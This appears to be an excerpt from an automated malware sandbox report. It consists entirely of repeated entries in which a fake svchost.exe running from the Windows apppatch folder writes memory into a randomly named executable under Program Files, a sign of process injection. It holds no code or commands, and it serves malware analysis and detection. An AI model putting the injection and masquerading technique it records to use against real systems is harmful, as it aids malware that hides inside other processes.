Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 902000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 954000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B60000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B61000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B62000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2BB4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2250000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2251000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2252000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 22A4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 27A0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 27A1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 27A2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 27F4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 24E0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 24E1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 24E2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2534000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2650000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2651000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2652000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 26A4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B10000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B11000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B12000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B64000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2AF0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2AF1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2AF2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B44000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2590000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2591000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2592000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 25E4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 29A0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 29A1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 29A2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 29F4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 7B0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 7B1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 7B2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 804000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2F70000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2F71000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2F72000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2FC4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 7C0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 7C1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 7C2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 814000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B30000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B31000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B32000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B84000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 12A0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 12A1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 12A2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 12F4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 6D0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 6D1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 6D2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 724000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2BB0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2BB1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2BB2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2C04000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2330000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2331000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2332000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2384000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B80000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B81000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B82000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2BD4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2890000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2891000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2892000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 28E4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2930000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2931000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2932000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2984000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2DB0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2DB1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2DB2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2E04000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 740000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 741000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 742000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 794000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3060000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3061000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3062000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 30B4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2DA0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2DA1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2DA2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2DF4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B60000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B61000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B62000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2BB4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3030000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3031000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3032000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3084000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 20C0000	Jump to behavior
